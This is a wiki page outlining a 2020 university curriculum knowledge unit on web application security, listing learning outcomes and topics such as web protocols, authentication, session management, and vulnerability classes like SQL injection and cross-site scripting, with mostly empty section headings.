Web Application Security (2020)

From CyberEdWiki
Jump to: navigation, search

The intent of the Web Application Security Knowledge Unit is to provide students with a understanding of technology, tools, and practices associated with web applications.


After completing the KU, students will be able to:

  1. Examine concepts of web application technologies and security issues associated with them.
  2. Describe approaches used in the development and deployment of secure web applications.
  3. Explain how web applications are operated in a secure manner.
  4. Be aware of recent trends in web attacks.


  1. Web Application Architectures
  2. Web Protocols
    • HTTP
    • HTML/CSS
    • AJAX
    • XML
    • JSON
  3. Web Application Technologies
    • Client side
    • Server side
    • Frameworks
  4. Web Security Concepts
    • Server-Side Controls
    • Authentication
    • Session Management
    • Access Controls
    • Client-Side Controls
  5. Web Vulnerabilities
    • Input-Based Vulnerabilities
      • SQL Injection
      • Blind SQL Injection
      • Cross-Site Scripting
      • Cross-site request forgery
      • Sanitization
    • Web Client Vulnerabilities
      • Client scripting
      • Client plugins
    • Web Scraping
    • Application Server Vulnerabilities
      • Function-Specific Input Vulnerabilities
      • Attacking Application Logic
    • Shared Hosting Vulnerabilities
  6. Recent Attack Trends


NICE Framework Categories[edit]

CSEC 2017 Categories[edit]

Specialization Areas[edit]

See also[edit]


Further reading[edit]

Suggested textbooks[edit]

Suggested academic readings[edit]

Sample knowledge test[edit]

Sample skills test[edit]

Sample abilities test[edit]

Additional notes or materials[edit]


Reference ID[edit]